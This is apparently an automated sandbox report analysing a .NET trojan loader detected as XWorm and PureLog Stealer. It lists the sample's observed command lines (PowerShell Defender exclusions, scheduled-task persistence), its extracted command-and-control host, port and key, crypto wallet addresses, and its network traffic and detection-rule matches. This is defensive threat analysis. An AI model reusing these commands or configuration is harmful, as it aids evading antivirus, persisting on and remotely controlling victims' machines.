
Windows Analysis Report
SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe

Overview

General Information

Sample name:SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Analysis ID:1476041
MD5:dc674885e842e9c05644ce23f5d8b665
SHA1:82b33f0734fa62ddd93f1dfdc34285e8713b3e66
SHA256:ea098f4397146a44801177898a66a0da04690d51a242c5687b5e2d33afae1bfd
Tags:exe
Infos:

Detection

PureLog Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe (PID: 672 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe" MD5: DC674885E842E9C05644CE23F5D8B665)
    • powershell.exe (PID: 1372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2328 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5196 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • xNgpESfQOvfb.exe (PID: 7084 cmdline: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe MD5: DC674885E842E9C05644CE23F5D8B665)
    • schtasks.exe (PID: 2828 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xNgpESfQOvfb.exe (PID: 6520 cmdline: "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe" MD5: DC674885E842E9C05644CE23F5D8B665)
    • xNgpESfQOvfb.exe (PID: 380 cmdline: "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe" MD5: DC674885E842E9C05644CE23F5D8B665)
  • cleanup
{"C2 url": ["moneymaker-30608.portmap.host"], "Port": "30608", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Yara matches in memory dumps (Source | Rule | Description | Author | Strings; 11 entries in the full report, first 5 shown):
  • 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
  • 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
    • 0x88ab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x8948:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x8a5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x843d:$cnc4: POST / HTTP/1.1
  • 00000000.00000002.2209442377.0000000007060000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
  • 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
  • 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Yara matches in unpacked PE files (Source | Rule | Description | Author; 25 entries in the full report, first 5 shown):
  • 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
  • 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
  • 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
  • 10.2.xNgpESfQOvfb.exe.2d51004.2.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
  • 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

                    System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ParentProcessId: 672, ParentProcessName: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ProcessId: 1372, ProcessName: powershell.exe
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ProcessId: 5332, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, ParentImage: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, ParentProcessId: 7084, ParentProcessName: xNgpESfQOvfb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp", ProcessId: 2828, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ParentProcessId: 672, ParentProcessName: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", ProcessId: 5196, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ParentProcessId: 672, ParentProcessName: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ProcessId: 1372, ProcessName: powershell.exe

                    Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ParentProcessId: 672, ParentProcessName: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", ProcessId: 5196, ProcessName: schtasks.exe
                    Timestamp:07/18/24-16:29:27.355688
                    SID:2855924
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/18/24-16:32:34.193805
                    SID:2852874
                    Source Port:30608
                    Destination Port:49717
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/18/24-16:31:23.445768
                    SID:2853193
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/18/24-16:33:12.637857
                    SID:2852923
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/18/24-16:33:12.636916
                    SID:2852870
                    Source Port:30608
                    Destination Port:49717
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-18T16:33:12.637857+0200
                    SID:2852923
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-18T16:31:23.445768+0200
                    SID:2853193
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-18T16:32:34.193805+0200
                    SID:2852874
                    Source Port:30608
                    Destination Port:49717
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-18T16:29:27.355688+0200
                    SID:2855924
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-18T16:33:12.636916+0200
                    SID:2852870
                    Source Port:30608
                    Destination Port:49717
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected


                    AV Detection

Source: moneymaker-30608.portmap.host, Avira URL Cloud: Label: phishing
Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Xworm {"C2 url": ["moneymaker-30608.portmap.host"], "Port": "30608", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: C:\Users\user\AppData\Roaming\XClient.exe, ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, ReversingLabs: Detection: 31%
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ReversingLabs: Detection: 31%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\XClient.exe, Joe Sandbox ML: detected
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Joe Sandbox ML: detected
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, String decryptor: moneymaker-30608.portmap.host
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, String decryptor: 30608
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, String decryptor: <123456789>
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, String decryptor: <Xwormmm>
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, String decryptor: XWorm V5.2
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, String decryptor: USB.exe
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, String decryptor: %AppData%
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, String decryptor: XClient.exe
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, String decryptor: bc1qz32y9es3p6hv6xs4kpqn4sqmrrr888qfyp67hm
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, String decryptor: 0xCe6C8E673e5d9aE4Ee7F357fE94b7EC06B52f3Fd
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, String decryptor: TSoemRqDkQLR8bnFkw6tsBTUAaAyCujx5y
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

Source: Traffic, Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49717 -> 193.161.193.99:30608
Source: Traffic, Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 193.161.193.99:30608 -> 192.168.2.6:49717
Source: Traffic, Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.6:49717 -> 193.161.193.99:30608
Source: Traffic, Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 193.161.193.99:30608 -> 192.168.2.6:49717
Source: Traffic, Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49717 -> 193.161.193.99:30608
Source: Malware configuration extractor, URLs: moneymaker-30608.portmap.host
Source: Yara match, File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE
Source: global traffic, TCP traffic: 192.168.2.6:49717 -> 193.161.193.99:30608
Source: Joe Sandbox View, IP Address: 193.161.193.99
Source: Joe Sandbox View, ASN Name: BITREE-ASRU
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: moneymaker-30608.portmap.host
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4633950904.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, xNgpESfQOvfb.exe, 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, XLogger.cs, .Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, XLogger.cs, .Net Code: KeyboardLayout
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Window created: window name: CLIPBRDWNDCLASS

                    System Summary

Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 10.2.xNgpESfQOvfb.exe.2d99478.0.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 15.2.xNgpESfQOvfb.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 10.2.xNgpESfQOvfb.exe.2d99478.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, MilkSales.cs, Large array initialization: array initializer size 494327
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_00ADDA34
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_056A0690
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_056A0680
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_07083B70
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_0708BB69
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_0708BB78
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_07083910
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_071DB048
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_071D3610
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_071D3A48
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_071D59B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_071D31D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_071D59C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_071D31C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 0_2_071D50F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 9_2_015D1358
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 9_2_015D3878
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Code function: 9_2_015D3F48
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_0100DA34
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_07583B70
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_07583B5F
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_0758BB78
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_0758BB69
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_07583910
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_075838F0
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_0782A4B0
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_07823610
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_07823A48
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_078259B8
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_078231C0
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_078259C8
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_078231D8
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 10_2_078250F0
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, Code function: 15_2_013A1358
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2198229058.00000000006CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2211596970.00000000077E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
